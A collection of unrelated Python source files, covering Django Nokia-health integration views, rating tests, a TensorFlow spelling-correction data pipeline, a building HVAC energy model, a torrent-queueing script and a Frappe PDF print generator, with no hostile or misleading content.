if utils.get_setting('NOKIA_SUBSCRIBE'):
for appli in [1, 4]:
notification_url = request.build_absolute_uri(
reverse('nokia-notification', kwargs={'appli': appli}))
api.subscribe(notification_url, 'django-nokia', appli=appli)
next_url = request.session.pop('nokia_next', None) or utils.get_setting(
'NOKIA_LOGIN_REDIRECT')
return redirect(next_url)
@receiver(user_logged_in)
def create_nokia_session(sender, request, user, **kwargs):
""" If the user is a Nokia user, update the profile in the session. """
if (user.is_authenticated() and utils.is_integrated(user) and
user.is_active):
nokia_user = NokiaUser.objects.filter(user=user)
if nokia_user.exists():
api = utils.create_nokia(**nokia_user[0].get_user_data())
try:
request.session['nokia_profile'] = api.get_user()
except:
pass
@login_required
def error(request):
"""
The user is redirected to this view if we encounter an error acquiring
their Nokia credentials. It renders the template defined in the setting
:ref:`NOKIA_ERROR_TEMPLATE`. The default template, located at
*nokia/error.html*, simply informs the user of the error::
<html>
<head>
<title>Nokia Authentication Error</title>
</head>
<body>
<h1>Nokia Authentication Error</h1>
<p>We encontered an error while attempting to authenticate you
through Nokia.</p>
</body>
</html>
URL name:
`nokia-error`
"""
return render(request, utils.get_setting('NOKIA_ERROR_TEMPLATE'), {})
@login_required
def logout(request):
"""Forget this user's Nokia credentials.
If the request has a `next` parameter, the user is redirected to that URL.
Otherwise, they're redirected to the URL defined in the setting
:ref:`NOKIA_LOGOUT_REDIRECT`.
URL name:
`nokia-logout`
"""
nokia_user = NokiaUser.objects.filter(user=request.user)
urls = []
for appli in [1, 4]:
for app in ['nokia', 'withings']:
try:
urls.append(request.build_absolute_uri(reverse(
'{}-notification'.format(app),
kwargs={'appli': appli}
)))
except NoReverseMatch:
# The library user does not have the legacy withings URLs
pass
if nokia_user.exists() and utils.get_setting('NOKIA_SUBSCRIBE'):
try:
api = utils.create_nokia(**nokia_user[0].get_user_data())
subs = api.list_subscriptions()
for sub in subs:
if sub['callbackurl'] in urls:
api.unsubscribe(sub['callbackurl'], appli=sub['appli'])
except:
return redirect(reverse('nokia-error'))
nokia_user.delete()
next_url = request.GET.get('next', None) or utils.get_setting(
'NOKIA_LOGOUT_REDIRECT')
return redirect(next_url)
@csrf_exempt
def notification(request, appli):
""" Receive notification from Nokia.
More information here:
https://developer.health.nokia.com/api/doc#api-Notification-Notification_callback
URL name:
`nokia-notification`
"""
if request.method == 'HEAD':
return HttpResponse()
# The updates come in as a POST request with the necessary data
uid = request.POST.get('userid')
if uid and request.method == 'POST':
for user in NokiaUser.objects.filter(nokia_user_id=uid):
kwargs = {}
if user.last_update:
kwargs['lastupdate'] = user.last_update
try:
measures = utils.get_nokia_data(user, **kwargs)
except Exception:
logger.exception("Error getting nokia user measures")
else:
MeasureGroup.create_from_measures(user.user, measures)
user.last_update = timezone.now()
user.save()
return HttpResponse(status=204)
# If GET request or POST with bad data, raise a 404
raise Http404
| nilq/baby-python | python |
import unittest
from skills import (
Match,
Matches,
Team,
)
from skills.glicko import (
GlickoCalculator,
GlickoGameInfo
)
class CalculatorTests(object):
ERROR_TOLERANCE_RATING = 0.085
ERROR_TOLERANCE_MATCH_QUALITY = 0.0005
def assertAlmostEqual(self, first, second, places, msg, delta):
raise NotImplementedError
def assertRating(self, expected_mean, expected_stdev, actual):
self.assertAlmostEqual(expected_mean, actual.mean, None,
"expected mean of %.14f, got %.14f" % (expected_mean, actual.mean),
CalculatorTests.ERROR_TOLERANCE_RATING)
self.assertAlmostEqual(expected_stdev, actual.stdev, None,
"expected stdev of %.14f, got %.14f" % (expected_stdev, actual.stdev),
CalculatorTests.ERROR_TOLERANCE_RATING)
def assertMatchQuality(self, expected_match_quality, actual_match_quality):
# self.assertEqual(expected_match_quality, actual_match_quality, "expected match quality of %f, got %f" % (expected_match_quality, actual_match_quality))
self.assertAlmostEqual(expected_match_quality, actual_match_quality, None,
"expected match quality of %.15f, got %.15f" % (expected_match_quality, actual_match_quality),
CalculatorTests.ERROR_TOLERANCE_MATCH_QUALITY)
class GlickoTests(unittest.TestCase, CalculatorTests):
def setUp(self):
self.calculator = GlickoCalculator()
def test_one_on_one(self):
game_info = GlickoGameInfo()
player1 = Team({1: (1500, 200)})
player2 = Team({2: (1400, 30)})
player3 = Team({3: (1550, 100)})
player4 = Team({4: (1700, 300)})
matches = Matches([Match([player1, player2], [1, 2]),
Match([player1, player3], [2, 1]),
Match([player1, player4], [2, 1])])
new_ratings = self.calculator.new_ratings(matches, 1, game_info)
# self.assertMatchQuality(1.0, self.calculator.calculate_match_quality(matches, game_info))
self.assertRating(1464.1, 151.4, new_ratings.rating_by_id(1))
if __name__ == "__main__":
unittest.main()
| nilq/baby-python | python |
#! /bin/python
__author__ = "glender"
__copyright__ = "Copyright (c) 2018 glender"
__credits__ = [ "glender" ]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "glender"
__email__ = "None"
__status__ = "Production"
DEBUG = False
alphabet="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
message = ("6340 8309 14010")
for i in message.split():
import numpy as np
import math
i = int(i)
# We need to solve the following system of equations
eq1 = "-26/676 * y - 1/676 * z + 1/676 * " + str(i)
eq2 = "-676 / 26 * x - 1/26 * z + 1/26 * " + str(i)
eq3 = "-676 * x - 26 * y + " + str(i)
if DEBUG:
print "Solving the following system of equations:"
print eq1
print eq2
print eq3
# Define x,y,z for our solution
x = 1
y = 1
z = 1
# Setup our np arrays to solve for x
a = np.array( [ [-1 * x, -26/676 * y, -1/676 * z], [-676/26 * x, -1 * y, -1/26 * z], [-676 * x, -26 * y, -1 * z] ])
b = np.array( [(-1 * i)/676, (-1 * i)/26, -1 * i] )
ans = np.linalg.solve(a,b)
x = math.floor(ans[0])
# Setup our np arrays to solve for y
a = np.array( [ [-1 * y, -1/26 * z], [-26 * y, -1 * z] ])
b = np.array( [(-1 * i)/26 + ((676/26) * x), (-1 * i) + (676 * x)] )
ans = np.linalg.solve(a,b)
y = math.floor(ans[0])
# Solve for z since we know x and y already
z = -676 * x - 26 * y + float(i)
print alphabet[int(x)] + alphabet[int(y)] + alphabet[int(z)]
| nilq/baby-python | python |
from __future__ import print_function
import sys
import os
import sysconfig
import filecmp
def diff_q(first_file, second_file):
"""Simulate call to POSIX diff with -q argument"""
if not filecmp.cmp(first_file, second_file, shallow=False):
print("Files %s and %s differ" % (first_file, second_file),
file=sys.stderr)
return 1
return 0
PYTHON = sys.executable or "python"
# 'bro.py' script should be in parent directory
BRO = os.path.abspath("../bro.py")
# get platform- and version-specific build/lib folder
platform_lib_name = "lib.{platform}-{version[0]}.{version[1]}".format(
platform=sysconfig.get_platform(),
version=sys.version_info)
# by default, distutils' build base is in the same location as setup.py
build_base = os.path.abspath(os.path.join("..", "..", "bin"))
build_lib = os.path.join(build_base, platform_lib_name)
# prepend build/lib to PYTHONPATH environment variable
TEST_ENV = os.environ.copy()
if 'PYTHONPATH' not in TEST_ENV:
TEST_ENV['PYTHONPATH'] = build_lib
else:
TEST_ENV['PYTHONPATH'] = build_lib + os.pathsep + TEST_ENV['PYTHONPATH']
| nilq/baby-python | python |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import random
from collections import namedtuple
import re
import numpy as np
import tensorflow as tf
import csv
import tokenization
from mask import Mask, PinyinConfusionSet, StrokeConfusionSet
DEBUG = False
InputExample = namedtuple('InputExample', ['tokens', 'labels', 'domain'])
InputFeatures = namedtuple('InputFeature', ['input_ids', 'input_mask', 'segment_ids', 'lmask', 'label_ids'])
def get_tfrecord_num(tf_file):
num = 0
for record in tf.python_io.tf_record_iterator(tf_file):
num += 1
return num
class DataProcessor:
'''
data format:
sent1\tsent2
'''
def __init__(self, input_path, max_sen_len, vocab_file, out_dir, label_list=None, is_training=True):
self.input_path = input_path
self.max_sen_len = max_sen_len
self.is_training = is_training
self.dataset = None
self.out_dir = out_dir
self.tokenizer = tokenization.FullTokenizer(vocab_file=vocab_file, do_lower_case=False)
self.label_list = label_list
if label_list is not None:
self.label_map = {}
for (i, label) in enumerate(self.label_list):
self.label_map[label] = i
else:
self.label_map = self.tokenizer.vocab
self.label_list = {}
for key in self.tokenizer.vocab:
self.label_list[self.tokenizer.vocab[key]] = key
same_py_file = './datas/confusions/same_pinyin.txt'
simi_py_file = './datas/confusions/simi_pinyin.txt'
stroke_file = './datas/confusions/same_stroke.txt'
tokenizer = self.tokenizer
pinyin = PinyinConfusionSet(tokenizer, same_py_file)
jinyin = PinyinConfusionSet(tokenizer, simi_py_file)
stroke = StrokeConfusionSet(tokenizer, stroke_file)
self.masker = Mask(same_py_confusion=pinyin, simi_py_confusion=jinyin, sk_confusion=stroke)
if input_path is not None:
if is_training is True:
self.tfrecord_path = os.path.join(self.out_dir, "train.tf_record")
else:
if 'multierror' in self.input_path:
self.tfrecord_path = os.path.join(self.out_dir, "eval_merr.tf_record")
else:
self.tfrecord_path = os.path.join(self.out_dir, "eval.tf_record")
#os.remove(self.tfrecord_path)
if os.path.exists(self.tfrecord_path) is False:
self.file2features()
else:
self.num_examples = get_tfrecord_num(self.tfrecord_path)
def sample(self, text_unicode1, text_unicode2, domain=None):
segs1 = text_unicode1.strip().split(' ')
segs2 = text_unicode2.strip().split(' ')
tokens, labels = [], []
if len(segs1) != len(segs2):
return None
for x, y in zip(segs1, segs2):
tokens.append(x)
labels.append(y)
if len(tokens) < 2: return None
return InputExample(tokens=tokens, labels=labels, domain=domain)
def load_examples(self):
'''sent1 \t sent2'''
train_data = open(self.input_path, encoding="utf-8")
instances = []
n_line = 0
for ins in train_data:
n_line += 1
if (DEBUG is True) and (n_line > 1000):
break
#ins = ins.decode('utf8')
tmps = ins.strip().split('\t')
if len(tmps) < 2:
continue
ins = self.sample(tmps[0], tmps[1])
if ins is not None:
yield ins
#instances.append(ins)
def convert_single_example(self, ex_index, example):
label_map = self.label_map
tokens = example.tokens
labels = example.labels
domain = example.domain
seg_value = 0
# Account for [CLS] and [SEP] with "- 2"
if len(tokens) > self.max_sen_len - 2:
tokens = tokens[0:(self.max_sen_len - 2)]
labels = labels[0:(self.max_sen_len - 2)]
_tokens = []
_labels = []
_lmask = []
segment_ids = []
_tokens.append("[CLS]")
_lmask.append(0)
_labels.append("[CLS]")
segment_ids.append(seg_value)
for token, label in zip(tokens, labels):
_tokens.append(token)
_labels.append(label)
_lmask.append(1)
segment_ids.append(seg_value)
_tokens.append("[SEP]")
segment_ids.append(seg_value)
_labels.append("[SEP]")
_lmask.append(0)
input_ids = self.tokenizer.convert_tokens_to_ids(_tokens)
label_ids = self.tokenizer.convert_tokens_to_ids(_labels)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < self.max_sen_len:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
_lmask.append(0)
assert len(input_ids) == self.max_sen_len
assert len(input_mask) == self.max_sen_len
assert len(segment_ids) == self.max_sen_len
if ex_index < 3:
tf.logging.info("*** Example ***")
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in _tokens]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
tf.logging.info("labels: %s" % " ".join(_labels))
tf.logging.info("labelids: %s" % " ".join(map(str, label_ids)))
tf.logging.info("lmask: %s" % " ".join(map(str, _lmask)))
feature = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
lmask=_lmask,
label_ids=label_ids
)
return feature
def get_label_list(self):
return self.label_list
def file2features(self):
output_file = self.tfrecord_path
if os.path.exists(output_file):
os.remove(output_file)
examples = self.load_examples()
writer = tf.python_io.TFRecordWriter(output_file)
for (ex_index, example) in enumerate(examples):
if ex_index % 10000 == 0:
print("Writing example %d" % ex_index)
feature = self.convert_single_example(ex_index, example)
create_int_feature = lambda values: tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
features = collections.OrderedDict()
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
features["lmask"] = create_int_feature(feature.lmask)
features["label_ids"] = create_int_feature(feature.label_ids)
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
writer.write(tf_example.SerializeToString())
self.num_examples = ex_index
def build_data_generator(self, batch_size):
def _decode_record(record):
"""Decodes a record to a TensorFlow example."""
name_to_features = {
"input_ids": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"input_mask": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"segment_ids": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"lmask": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"label_ids": tf.FixedLenFeature([self.max_sen_len], tf.int64),
}
example = tf.parse_single_example(record, name_to_features)
#int64 to int32
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
input_ids = example['input_ids']
input_mask = example['input_mask']
segment_ids = example['segment_ids']
label_ids = example['label_ids']
lmask = example['lmask']
if self.is_training is True:
#if str(self.is_training) == 'xx' :
masked_sample = tf.py_func(self.masker.mask_process, [input_ids, label_ids], [tf.int32])
masked_sample = tf.reshape(masked_sample, [self.max_sen_len])
lmask = tf.reshape(lmask, [self.max_sen_len])
else:
masked_sample = input_ids
return input_ids, input_mask, segment_ids, lmask, label_ids, masked_sample
if self.dataset is not None:
return self.dataset
dataset = tf.data.TFRecordDataset(self.tfrecord_path)
dataset = dataset.map(_decode_record, num_parallel_calls=10)
if self.is_training:
dataset = dataset.repeat().shuffle(buffer_size=100)
dataset = dataset.batch(batch_size).prefetch(50)
self.dataset = dataset
return dataset
def get_feature(self, u_input, u_output=None):
if u_output is None:
u_output = u_input
instance = self.sample(u_input, u_output)
feature = self.convert_single_example(0, instance)
input_ids = feature.input_ids
input_mask = feature.input_mask
segment_ids = feature.segment_ids
label_ids = feature.label_ids
label_mask = feature.lmask
return input_ids, input_mask, segment_ids, label_ids, label_mask
| nilq/baby-python | python |
"""Calculate autosome ratios for each cell.
This script calculates the {X, 4, and Y} to autosome ratios for each
individual cell. I consider chromosomes 2L, 2R, 3L, and 3R as autosomes.
1. Pull out target FBgns.
2. Sum the number of raw reads for each chromosome.
3. Normalize totals by the number of genes on each chromosome.
4. Take the ratio of X / A, 4 / A, and Y / A
"""
import pandas as pd
from larval_gonad.io import pickle_load
def main(snake):
annot = gene_annotation_for_target_genes(snake["fbgn2chrom"], snake["target_fbgns"])
clusters = pd.read_feather(snake["clusters"]).set_index("cell_id")
num_genes_per_chrom = calculate_number_of_genes_per_chrom(annot, snake["autosomes"])
agg_counts = aggregate_count_data_to_chrom(snake["raw"], annot, snake["chrom_order"])
ratios = calculate_ratios(agg_counts, num_genes_per_chrom, snake['autosomes'])
ratios.join(clusters, how="inner").reset_index().to_feather(snake["output_file"])
def gene_annotation_for_target_genes(fbgn2chrom: str, target_fbgns: str) -> pd.DataFrame:
"""Subset fbg2chrom based on target gene set."""
return pickle_load(fbgn2chrom).reindex(pickle_load(target_fbgns)).dropna().squeeze()
def calculate_number_of_genes_per_chrom(annot: pd.DataFrame, autosomes: list) -> pd.Series:
"""Count the number of genes on each chromosome and the autosomes together."""
num_genes_per_chrom = annot.value_counts()
num_genes_per_chrom["autosome"] = num_genes_per_chrom.loc[autosomes].sum()
return num_genes_per_chrom
def aggregate_count_data_to_chrom(raw: str, annot: pd.DataFrame, chrom_order: list) -> pd.DataFrame:
"""Sum the number of reads for each chromosome."""
return (
pd.read_feather(raw)
.set_index("FBgn")
.join(annot, how="inner")
.groupby("chrom")
.sum()
.reindex(chrom_order)
.fillna(0)
.T.rename_axis("cell_id")
)
def calculate_ratios(
agg_counts: pd.DataFrame, num_genes_per_chrom: pd.Series, autosomes: list
) -> pd.Series:
"""Normalize by gene count and calculate autosome ratios."""
return (
agg_counts.assign(autosome=lambda agg_counts: agg_counts[autosomes].sum(axis=1))
.div(num_genes_per_chrom / 1e3, axis="columns")
.assign(x_to_a_ratio=lambda agg_counts: agg_counts["X"] / agg_counts.autosome)
.assign(fourth_to_a_ratio=lambda agg_counts: agg_counts["4"] / agg_counts.autosome)
.assign(y_to_a_ratio=lambda agg_counts: agg_counts["Y"] / agg_counts.autosome)
.loc[:, ["x_to_a_ratio", "fourth_to_a_ratio", "y_to_a_ratio"]]
)
if __name__ == "__main__":
SNAKE = dict(
raw=snakemake.input["raw"],
fbgn2chrom=snakemake.input["fbgn2chrom"],
clusters=snakemake.input["clusters"],
target_fbgns=snakemake.input["target_fbgns"],
autosomes=snakemake.params["autosomes"],
chrom_order=snakemake.params["chrom_order"],
output_file=snakemake.output[0],
)
# Debug Settings
# import os
# try:
# os.chdir(os.path.join(os.getcwd(), "x-to-a-wf/scripts"))
# print(os.getcwd())
# except:
# pass
# from larval_gonad.config import read_config
# config = read_config("../../config/common.yaml")
# SNAKE = dict(
# raw="../../output/cellselection-wf/raw.feather"
# fbgn2chrom="../../output/x-to-a-wf/fbgn2chrom.pkl"
# clusters="../../output/seurat3-cluster-wf/combined_n3_clusters.feather"
# target_fbgns='../../output/cellselection-wf/commonly_expressed_genes.pkl'
# snake_autosomes=config["autosomes"]
# snake_chrom_order=config["chrom_order"]
# snake_output_file=''
# )
main(SNAKE)
| nilq/baby-python | python |
from django.conf.urls import url
from . import views
urlpatterns = [
url('api/product/search', views.GoodsSearch),
url('api/product/history', views.GetHistory)
] | nilq/baby-python | python |
import logging
import importlib
from volttron.platform.agent import utils
import volttron.pnnl.models.input_names as data_names
_log = logging.getLogger(__name__)
utils.setup_logging()
class ahuchiller(object):
def __init__(self, config, parent, **kwargs):
self.parent = parent
equipment_conf = config.get("equipment_configuration")
model_conf = config.get("model_configuration")
self.cpAir = model_conf["cpAir"]
self.c0 = model_conf["c0"]
self.c1 = model_conf["c1"]
self.c2 = model_conf["c2"]
self.c3 = model_conf["c3"]
self.power_unit = model_conf.get("unit_power", "kw")
self.cop = model_conf["COP"]
self.mDotAir = model_conf.get("mDotAir", 0.0)
self.name = 'AhuChiller'
self.has_economizer = equipment_conf["has_economizer"]
self.economizer_limit = equipment_conf["economizer_limit"]
self.min_oaf = equipment_conf.get("minimum_oaf", 0.15)
self.vav_flag = equipment_conf.get("variable-volume", True)
self.sat_setpoint = equipment_conf["supply-air sepoint"]
self.building_chiller = equipment_conf["building chiller"]
self.tset_avg = equipment_conf["nominal zone-setpoint"]
self.tDis = self.sat_setpoint
self.parent.supply_commodity = "ZoneAirFlow"
self.fan_power = 0.
self.mDotAir = 0.
self.coil_load = 0.
self.get_input_value = parent.get_input_value
self.smc_interval = parent.single_market_contol_interval
self.parent = parent
self.sfs_name = data_names.SFS
self.mat_name = data_names.MAT
self.dat_name = data_names.DAT
self.saf_name = data_names.SAF
self.oat_name = data_names.OAT
self.rat_name = data_names.RAT
self.sfs = None
self.mat = None
self.dat = None
self.saf = None
self.oat = None
self.rat = None
def update_data(self):
self.sfs = self.get_input_value(self.sfs_name)
self.mat = self.get_input_value(self.mat_name)
self.dat = self.get_input_value(self.dat_name)
self.saf = self.get_input_value(self.saf_name)
self.oat = self.get_input_value(self.oat_name)
self.rat = self.get_input_value(self.rat_name)
def input_zone_load(self, q_load):
if self.vav_flag:
self.mDotAir = q_load
else:
self.tDis = q_load
self.dat = q_load
def calculate_fan_power(self):
if self.power_unit == 'W':
self.fan_power = (self.c0 + self.c1*self.mDotAir + self.c2*pow(self.mDotAir, 2) + self.c3*pow(self.mDotAir, 3))*1000. # watts
else:
self.fan_power = self.c0 + self.c1*self.mDotAir + self.c2*pow(self.mDotAir, 2) + self.c3*pow(self.mDotAir, 3) # kW
def calculate_coil_load(self, oat):
if self.has_economizer:
if oat < self.tDis:
coil_load = 0.0
elif oat < self.economizer_limit:
coil_load = self.mDotAir * self.cpAir * (self.tDis - oat)
else:
mat = self.tset_avg*(1.0 - self.min_oaf) + self.min_oaf*oat
coil_load = self.mDotAir * self.cpAir * (self.tDis - mat)
else:
mat = self.tset_avg * (1.0 - self.min_oaf) + self.min_oaf * oat
coil_load = self.mDotAir * self.cpAir * (self.tDis - mat)
if coil_load > 0: #heating mode is not yet supported!
self.coil_load = 0.0
else:
self.coil_load = coil_load
def calculate_load(self, q_load, oat):
self.input_zone_load(q_load)
return self.calculate_total_power(oat)
def single_market_coil_load(self):
try:
self.coil_load = self.mDotAir * self.cpAir * (self.dat - self.mat)
except:
_log.debug("AHU for single market requires dat and mat measurements!")
self.coil_load = 0.
def calculate_total_power(self, oat):
self.calculate_fan_power()
oat = oat if oat is not None else self.oat
if self.building_chiller and oat is not None:
if self.smc_interval is not None:
self.single_market_coil_load()
else:
self.calculate_coil_load(oat)
else:
_log.debug("AHUChiller building does not have chiller or no oat!")
self.coil_load = 0.0
return abs(self.coil_load)/self.cop/0.9 + max(self.fan_power, 0)
| nilq/baby-python | python |
import sys
sys.path.append('../')
import lcm
import time
from exlcm import ax_control_t
from exlcm import veh_status_t
from exlcm import net_status_t
from exlcm import mode_control_t
from exlcm import eng_toggle_t
lc = lcm.LCM()
test_message = veh_status_t()
test_message.running = True
test_message.rpm = 3110
test_message.speed = 40
test_message.temp = 220
test_message.fuel_flow = 346
test_message.pressure = 1230
eng_toggle_msg = eng_toggle_t()
eng_toggle_msg.toggle = True
signal_message = net_status_t()
signal_message.signal_str = 4
mode_message = mode_control_t()
mode_message.evos_mode = "DEV"
while True:
lc.publish("eng_status", test_message.encode())
lc.publish("net_status", signal_message.encode())
lc.publish("mode_control", mode_message.encode())
lc.publish("eng_toggle", eng_toggle_msg.encode())
print 'Printing..'
time.sleep(1)
test_message.rpm += 1
eng_toggle_msg.toggle = ~eng_toggle_msg.toggle
| nilq/baby-python | python |
import datetime
import json
import pathlib
import time
import httpx
import xmltodict
import yaml
nyaa_url = 'https://nyaa.si'
transmission_rpc_url = "http://localhost:9091/transmission/rpc"
session_field = 'X-Transmission-Session-Id'
class TransmissionApi():
def __init__(self):
self.restart_session()
def restart_session(self):
self.session = httpx.Client(base_url=transmission_rpc_url)
response = self.session.post(url='', data={'method': 'session-get'})
self.headers = {session_field: response.headers[session_field]}
def torrent_add(self, torrent_url, download_location, tries=2):
if tries == 0:
raise Exception('Error contacting Transmission server.')
data = json.dumps({
'method': 'torrent-add'
, 'arguments':
{ 'download-dir': str(download_location)
, 'filename': torrent_url
}
})
response:httpx.Response = self.session.post(url='', headers=self.headers, content=data)
if response.status_code == 200:
print(datetime.datetime.now(), download_location)
elif response.status_code == 409:
self.restart_session()
self.torrent_add(torrent_url, download_location, tries - 1)
def ensure_list(thing):
return thing if type(thing) is list else [thing]
def get_torrent_data_for_show(search_string):
response = httpx.get(nyaa_url, params={'page': 'rss', 'q': search_string})
if response.status_code == 200:
return ensure_list(xmltodict.parse(response.text)['rss']['channel']['item'])
def download_show(search_string, download_location, episode_start=1):
session = TransmissionApi()
episodes = get_torrent_data_for_show(search_string)[episode_start - 1:]
for episode in episodes:
filepath = download_location / episode['title']
partpath = filepath.with_suffix('.part')
if filepath.exists() or partpath.exists():
continue
session.torrent_add(episode['link'], download_location)
time.sleep(1)
def download_all_shows(config):
root = pathlib.Path(config['root'])
for show in config['shows']:
search_string, folder, *start = show
start = 1 if start == [] else start[0]
folder = root / folder
download_show(search_string, folder, start)
if __name__ == '__main__':
with open('shows.yml', 'r', encoding='utf-8') as f:
config = yaml.load(f, Loader=yaml.Loader)
download_all_shows(config)
| nilq/baby-python | python |
from cedar_settings.default_settings import default_settings
default_settings['assets__default_search_results_per_page'] = ('int', 20) # integer hours.
default_settings['assets__default_asset_source_string'] = ('text', "Miscellaneous")
default_settings['assets__default_files_div_id'] = ('text', "#tab-files")
| nilq/baby-python | python |
# Copyright (c) 2021, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See LICENSE
import click
import frappe
@frappe.whitelist()
def download_pdf(doctype, name, print_format, letterhead=None):
doc = frappe.get_doc(doctype, name)
generator = PrintFormatGenerator(print_format, doc, letterhead)
pdf = generator.render_pdf()
frappe.local.response.filename = "{name}.pdf".format(
name=name.replace(" ", "-").replace("/", "-")
)
frappe.local.response.filecontent = pdf
frappe.local.response.type = "pdf"
def get_html(doctype, name, print_format, letterhead=None):
doc = frappe.get_doc(doctype, name)
generator = PrintFormatGenerator(print_format, doc, letterhead)
return generator.get_html_preview()
class PrintFormatGenerator:
"""
Generate a PDF of a Document, with repeatable header and footer if letterhead is provided.
This generator draws its inspiration and, also a bit of its implementation, from this
discussion in the library github issues: https://github.com/Kozea/WeasyPrint/issues/92
"""
def __init__(self, print_format, doc, letterhead=None):
"""
Parameters
----------
print_format: str
Name of the Print Format
doc: str
Document to print
letterhead: str
Letter Head to apply (optional)
"""
self.base_url = frappe.utils.get_url()
self.print_format = frappe.get_doc("Print Format", print_format)
self.doc = doc
self.letterhead = frappe.get_doc("Letter Head", letterhead) if letterhead else None
self.build_context()
self.layout = self.get_layout(self.print_format)
self.context.layout = self.layout
def build_context(self):
self.print_settings = frappe.get_doc("Print Settings")
page_width_map = {"A4": 210, "Letter": 216}
page_width = page_width_map.get(self.print_settings.pdf_page_size) or 210
body_width = (
page_width - self.print_format.margin_left - self.print_format.margin_right
)
print_style = (
frappe.get_doc("Print Style", self.print_settings.print_style)
if self.print_settings.print_style
else None
)
context = frappe._dict(
{
"doc": self.doc,
"print_format": self.print_format,
"print_settings": self.print_settings,
"print_style": print_style,
"letterhead": self.letterhead,
"page_width": page_width,
"body_width": body_width,
}
)
self.context = context
def get_html_preview(self):
header_html, footer_html = self.get_header_footer_html()
self.context.header = header_html
self.context.footer = footer_html
return self.get_main_html()
def get_main_html(self):
self.context.css = frappe.render_template(
"templates/print_format/print_format.css", self.context
)
return frappe.render_template(
"templates/print_format/print_format.html", self.context
)
def get_header_footer_html(self):
header_html = footer_html = None
if self.letterhead:
header_html = frappe.render_template(
"templates/print_format/print_header.html", self.context
)
if self.letterhead:
footer_html = frappe.render_template(
"templates/print_format/print_footer.html", self.context
)
return header_html, footer_html
def render_pdf(self):
"""
Returns
-------
pdf: a bytes sequence
The rendered PDF.
"""
HTML, CSS = import_weasyprint()
self._make_header_footer()
self.context.update(
{"header_height": self.header_height, "footer_height": self.footer_height}
)
main_html = self.get_main_html()
html = HTML(string=main_html, base_url=self.base_url)
main_doc = html.render()
if self.header_html or self.footer_html:
self._apply_overlay_on_main(main_doc, self.header_body, self.footer_body)
pdf = main_doc.write_pdf()
return pdf
def _compute_overlay_element(self, element: str):
"""
Parameters
----------
element: str
Either 'header' or 'footer'
Returns
-------
element_body: BlockBox
A Weasyprint pre-rendered representation of an html element
element_height: float
The height of this element, which will be then translated in a html height
"""
HTML, CSS = import_weasyprint()
html = HTML(string=getattr(self, f"{element}_html"), base_url=self.base_url,)
element_doc = html.render(
stylesheets=[CSS(string="@page {size: A4 portrait; margin: 0;}")]
)
element_page = element_doc.pages[0]
element_body = PrintFormatGenerator.get_element(
element_page._page_box.all_children(), "body"
)
element_body = element_body.copy_with_children(element_body.all_children())
element_html = PrintFormatGenerator.get_element(
element_page._page_box.all_children(), element
)
if element == "header":
element_height = element_html.height
if element == "footer":
element_height = element_page.height - element_html.position_y
return element_body, element_height
def _apply_overlay_on_main(self, main_doc, header_body=None, footer_body=None):
"""
Insert the header and the footer in the main document.
Parameters
----------
main_doc: Document
The top level representation for a PDF page in Weasyprint.
header_body: BlockBox
A representation for an html element in Weasyprint.
footer_body: BlockBox
A representation for an html element in Weasyprint.
"""
for page in main_doc.pages:
page_body = PrintFormatGenerator.get_element(page._page_box.all_children(), "body")
if header_body:
page_body.children += header_body.all_children()
if footer_body:
page_body.children += footer_body.all_children()
def _make_header_footer(self):
self.header_html, self.footer_html = self.get_header_footer_html()
if self.header_html:
header_body, header_height = self._compute_overlay_element("header")
else:
header_body, header_height = None, 0
if self.footer_html:
footer_body, footer_height = self._compute_overlay_element("footer")
else:
footer_body, footer_height = None, 0
self.header_body = header_body
self.header_height = header_height
self.footer_body = footer_body
self.footer_height = footer_height
def get_layout(self, print_format):
layout = frappe.parse_json(print_format.format_data)
layout = self.set_field_renderers(layout)
layout = self.process_margin_texts(layout)
return layout
def set_field_renderers(self, layout):
renderers = {"HTML Editor": "HTML", "Markdown Editor": "Markdown"}
for section in layout["sections"]:
for column in section["columns"]:
for df in column["fields"]:
fieldtype = df["fieldtype"]
renderer_name = fieldtype.replace(" ", "")
df["renderer"] = renderers.get(fieldtype) or renderer_name
df["section"] = section
return layout
def process_margin_texts(self, layout):
margin_texts = [
"top_left",
"top_center",
"top_right",
"bottom_left",
"bottom_center",
"bottom_right",
]
for key in margin_texts:
text = layout.get("text_" + key)
if text and "{{" in text:
layout["text_" + key] = frappe.render_template(text, self.context)
return layout
@staticmethod
def get_element(boxes, element):
"""
Given a set of boxes representing the elements of a PDF page in a DOM-like way, find the
box which is named `element`.
Look at the notes of the class for more details on Weasyprint insides.
"""
for box in boxes:
if box.element_tag == element:
return box
return PrintFormatGenerator.get_element(box.all_children(), element)
def import_weasyprint():
try:
from weasyprint import HTML, CSS
return HTML, CSS
except OSError:
message = "\n".join([
"WeasyPrint depdends on additional system dependencies.",
"Follow instructions specific to your operating system:",
"https://doc.courtbouillon.org/weasyprint/stable/first_steps.html"
])
click.secho(
message,
fg="yellow"
)
frappe.throw(message)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
import argparse
import abc
from six import add_metaclass, text_type
import argparse
import re
from mCli.utils import get_resource_classes, Singleton
from mCli.commands.base import Command
@add_metaclass(abc.ABCMeta)
class CommandManager(Singleton, object):
"""Base class for commands
"""
description = ""
